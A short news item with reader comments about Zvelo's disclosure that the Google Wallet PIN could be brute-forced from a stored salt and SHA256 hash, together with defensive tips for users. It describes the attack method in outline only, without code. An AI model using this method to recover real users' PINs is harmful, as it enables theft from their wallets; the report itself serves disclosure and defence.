Web security provider Zvelo has uncovered a way crack the Google Wallet PIN security feature.
Using an app called “Wallet Cracker,” Zvelo was able to expose the PIN of a Google Wallet account without entering a single invalid attempt – five invalid attempts and the wallet locks out.
Check out the video for a demonstration:
So how did they do it?
“Within the PIN information section was a long integer ‘salt’ and a SHA256 hex encoded string ‘hash,’” Zvelo said in a release. “Knowing that the PIN can only be a 4-digit numeric value, it dawned on us that a brute-force attack would only require calculating, at most, 10,000 SHA256 hashes. This is trivial even on a platform as limited as a smart phone. Proving this hypothesis took little time.”
Zvelo says it has shared the discovery with Google, who confirmed the issue and agreed to “work quickly to resolve it.” In the meantime, Zvelo offers the following recommendations for Wallet users:
Do Not “Root” the Cell Phone – Doing so will be one less step for a thief.
Enable Lock Screens – Face Unlock, Pattern, PIN and Password all increase physical security to the device. Slide, however, does not.
Disable USB Debugging – When enabled, the data on mobile devices can be accessed without first passing a lock screen challenge unless Full Disk Encryption is also enabled.
Enable Full Disk Encryption – This will prevent even USB Debugging from bypassing the lock screen.
Maintain Device Up-To-Date – Ensure the device is current with the latest official software. Unfortunately, users are largely at the behest of their carrier and cell phone manufacturer for this. Using only official software and keeping devices up-to-date is the best way to minimize vulnerabilities and increase security overall.
![[end]](/resources/bullet/nfcnews-4.gif)
The PIN is stored in the app ??? Google is not aware there is a secure element in the phone ???
I just can't believe it !
I love the concept behind Google Wallet (http://www.google.com/wallet), because I believe that digital wallets, just like their physical equivalents, should allow their users to store in them all of the payment instruments they may want, including credit and debit cards issued by different banks and displaying different brand logos. And Google is doing precisely that. However, data security is much more important than either user-friendliness or convenience. In fact, your service should not be offered to consumers until you can guarantee that your system can protect their personal information. And that is clearly not the case with Google. Moreover, hacking Google Wallet is reported to be a "trivial" exercise, which makes me wonder whether Google even cares all that much about protecting its customers' information. I can only hope they will prove that they do. http://blog.unibulmerchantservices.com/app-cracks-your-google-wallet-pin-in-seconds